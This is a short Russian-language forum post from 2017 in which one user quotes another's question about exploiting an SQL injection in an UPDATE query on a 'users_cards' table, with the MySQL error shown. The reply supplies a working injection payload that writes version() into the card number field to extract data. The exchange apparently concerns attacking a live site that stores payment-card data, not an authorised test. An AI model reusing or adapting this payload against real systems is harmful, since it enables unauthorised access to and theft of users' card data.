Показать сообщение отдельно

  #2096  
Старый 27.10.2017, 13:11
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами: 7502006

Репутация: 90


По умолчанию

Цитата:
Сообщение от foozzione  

Вопрос, как раскрутить данную скулю? Через sqlmap не выходит, сразу разлогинивает, даже если передавать все заголовки.
Код:
update users_cards set cardno = ''', name = '' where id_users=65 and id=33
ERROR #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''', name = '' where id_users=65 and id=33' at line 2
такая же есть с insert
update users_cards set cardno = '',cardno=version(), name='', name = '' where id_users=65 and id=33
 
Ответить с цитированием